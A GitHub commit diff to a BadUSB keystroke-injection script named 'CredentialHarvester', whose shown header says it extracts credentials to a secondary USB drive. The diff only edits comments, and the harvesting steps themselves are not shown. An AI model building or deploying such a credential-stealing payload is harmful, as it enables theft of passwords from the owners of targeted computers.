Update CredentialHarvester.txt

This commit is contained in:
Mark
2024-05-21 16:26:17 -04:00
committed by GitHub
parent 5f95a6d349
commit 9109f85a8e
@@ -3,7 +3,7 @@ REM ############## This script was created by github.com/markcyb
REM ############## This script requires a secondary USB named "MYUSB" to save credentials to ##############
REM ############## The extracted data will require decryption ##############
REM ##################################################################################################################
REM Open PowerShell with elevated privileges
REM Open PowerShell
DELAY 1000
GUI r
DELAY 500
@@ -51,3 +51,4 @@ REM Close PowerShell
STRING exit
ENTER
DELAY 500
REM Check out Github.com/MarkCyber for more badusb scripts and other hacky stuff